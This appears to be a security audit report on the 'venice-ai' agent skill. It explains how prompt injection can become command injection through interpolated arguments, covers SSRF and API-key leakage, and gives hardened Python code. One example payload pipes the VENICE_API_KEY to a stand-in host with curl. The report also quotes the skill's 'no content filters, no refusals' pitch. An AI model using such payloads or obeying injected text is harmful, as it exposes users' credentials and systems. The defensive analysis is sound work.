The skill is vulnerable to command injection and prompt injection
Claims to do
Venice AI — Complete Platform Skill: **Venice AI is the AI platform for people who don't want Big Tech watching over their shoulder.** Unlike OpenAI, Anthropic, and Google — where every prompt is logged, analyzed, and potentially used to train future models — Venice offers **true privacy** with zero data retention on private models. Your conversations stay yours.
Actually does
The skill executes various Python scripts (`venice.py`, `venice-image.py`, etc.) using `python3`. It requires a `VENICE_API_KEY` to authenticate and interact with the Venice AI platform's API. These scripts send user prompts, local files (images, audio, video), and specified URLs to the Venice AI service for tasks like text generation, vision analysis, embeddings, TTS, speech-to-text, image/video/music generation, and editing.
openclaw skills install jonisjongithub/venice-ai

DeBERTa classifier detected prompt injection (confidence: 0.98)

The skill executes local Python scripts with user-provided arguments, including file paths and URLs. If the agent assembles those command lines by string interpolation rather than passing each argument as a separate argv element, untrusted input (including text that arrives via prompt injection) can break out of the quoting and run arbitrary commands. Unrestricted file-path arguments give the scripts broad read/write access to the local filesystem, and unrestricted URL arguments allow Server-Side Request Forgery (SSRF) against internal services.
python3 {baseDir}/scripts/venice.py chat "..."
python3 {baseDir}/scripts/venice.py analyze photo.jpg
python3 {baseDir}/scripts/venice.py analyze "https://example.com/image.jpg"
python3 {baseDir}/scripts/venice.py tts "..." --output /tmp/speech.mp3

The skill requires a `VENICE_API_KEY` to be set as an environment variable. While not hardcoded, the Python scripts that interact with the Venice API read this key from the environment, and any command injected through the wrapper inherits that environment, so a successful injection can exfiltrate the key along with any other secrets the agent process carries.
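The following is an added example for the two findings above (command injection through interpolated arguments, and key exposure through the inherited environment); it is illustrative code written for this report, not the venice-ai skill's own scripts. It contrasts a wrapper that builds a shell string from untrusted input with a dispatcher that passes argv directly, confines file paths to a workspace, vets URLs before they reach the script, and hands the child only `PATH` and `VENICE_API_KEY`. `SCRIPT`, `ALLOWED_ROOT`, `SUBCOMMANDS` and the `FAKE_DNS` table are assumptions made so the example runs offline.

```python
"""Added example (not the venice-ai skill's own code): a naive shell-string
wrapper beside a hardened dispatcher for the venice.py subcommands.
SCRIPT, ALLOWED_ROOT, SUBCOMMANDS and FAKE_DNS are assumptions for the demo."""
import ipaddress
import os
import shlex
import socket
import subprocess
import tempfile
from pathlib import Path
from urllib.parse import urlsplit

SCRIPT = "/opt/skills/venice-ai/scripts/venice.py"   # assumed {baseDir}/scripts/venice.py
ALLOWED_ROOT = (Path(tempfile.gettempdir()) / "venice-workspace").resolve()  # assumed sandbox
SUBCOMMANDS = {"chat", "analyze", "tts"}             # subcommands quoted in the report

# --- vulnerable pattern: string interpolation handed to shell=True ---------------
def vulnerable_cmdline(subcmd: str, arg: str) -> str:
    """Wrapping arg in quotes is not escaping: a '"' inside arg closes the quote
    and whatever follows a ';' runs as a second shell command."""
    return f'python3 {SCRIPT} {subcmd} "{arg}"'

def shell_tokens(cmdline: str) -> list:
    """Tokenise like sh, keeping ';', '|', '&' as their own tokens, so the
    injected command boundary is visible without executing anything."""
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    return list(lex)

# --- hardened dispatcher ------------------------------------------------------
def safe_local_path(user_path: str) -> Path:
    """Resolved path must stay under ALLOWED_ROOT: rejects '../../etc/passwd'
    and absolute paths such as '/etc/cron.d/job' (read and write sides alike)."""
    candidate = (ALLOWED_ROOT / user_path).resolve()
    try:
        candidate.relative_to(ALLOWED_ROOT)
    except ValueError:
        raise ValueError(f"path escapes workspace: {user_path}") from None
    return candidate

FAKE_DNS = {  # constructed lookup table so the example runs offline
    "example.com": ["93.184.216.34"],
    "localhost": ["127.0.0.1"],
    "metadata.internal": ["169.254.169.254"],
}

def fake_resolver(host: str) -> list:
    if host not in FAKE_DNS:
        raise ValueError(f"unknown host: {host}")
    return FAKE_DNS[host]

def system_resolver(host: str) -> list:
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})

def safe_remote_url(url: str, resolver=system_resolver) -> str:
    """Allow only http(s) to hosts whose every address is publicly routable;
    blocks file://, loopback, RFC 1918 and link-local (cloud metadata) targets."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if parts.username or parts.password:
        raise ValueError("credentials in URL not allowed")
    if not parts.hostname:
        raise ValueError("missing host")
    try:
        addrs = [ipaddress.ip_address(parts.hostname)]          # literal IP
    except ValueError:
        addrs = [ipaddress.ip_address(a) for a in resolver(parts.hostname)]
    for addr in addrs:
        if not addr.is_global:
            raise ValueError(f"{parts.hostname} maps to non-public {addr}")
    return url

def plan_invocation(subcmd, arg, api_key, output=None, resolver=system_resolver):
    """Return (argv, env) for subprocess.run with shell=False: each user value is
    one argv element that nothing re-parses, and the child sees only the two
    variables it needs instead of the agent's whole environment."""
    if subcmd not in SUBCOMMANDS:
        raise ValueError(f"unknown subcommand: {subcmd}")
    if arg.startswith("-"):
        raise ValueError("argument looks like an option; refusing to pass it")
    if subcmd == "analyze":
        arg = (safe_remote_url(arg, resolver) if urlsplit(arg).scheme
               else str(safe_local_path(arg)))
    argv = ["python3", SCRIPT, subcmd, arg]
    if output is not None:                         # e.g. tts --output speech.mp3
        argv += ["--output", str(safe_local_path(output))]
    env = {"PATH": os.environ.get("PATH", ""), "VENICE_API_KEY": api_key}
    return argv, env

def run_skill(subcmd, arg, api_key, output=None):
    argv, env = plan_invocation(subcmd, arg, api_key, output)
    return subprocess.run(argv, env=env, capture_output=True, text=True, timeout=120)
```

Feeding `vulnerable_cmdline("chat", '"; curl http://evil.example/$VENICE_API_KEY #')` to `shell_tokens` shows `;` and `curl` as separate tokens after the script arguments, which is exactly what `sh -c` would execute; `plan_invocation` passes the same payload as a single argv element. The URL check still leaves a DNS-rebinding window between validation and fetch; closing it requires connecting to the vetted address and sending the Host header explicitly. Passing only `VENICE_API_KEY` through does not stop that one key from being misused by a compromised script, but it keeps the agent's other secrets out of the child's reach.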
requires: { "bins": ["python3"], "env": ["VENICE_API_KEY"] }
export VENICE_API_KEY="vn_your_key_here"

The skill explicitly promotes 'uncensored' AI models, stating 'no content filters, no refusals.' This framing could encourage generation of content that violates ethical guidelines, produces harmful output, or assists malicious activity, and it bypasses the safety mechanisms and human oversight that a filtered model would otherwise provide.

Venice is also **uncensored**: no content filters, no refusals, no "I can't help with that." Uncensored responses — No guardrails blocking legitimate use cases.
--no-venice-system-prompt
The skill's stated purpose heavily emphasizes 'true privacy' and 'zero data retention'. While the skill exposes options to enable Venice AI's advertised privacy features (e.g., E2EE, private models), the skill itself is a client that sends user data (prompts, local files, URLs) to the remote Venice AI service. The privacy guarantees depend entirely on that service's implementation and trustworthiness; nothing in the locally executed skill enforces or verifies them.
The skill's scripts make API calls to `venice.ai` and pass user data. The privacy claims are attributes of the remote service, not the local client skill.
Mondoo Skill Check: https://mondoo.com/ai-agent-security/skills/clawhub/jonisjongithub/venice-ai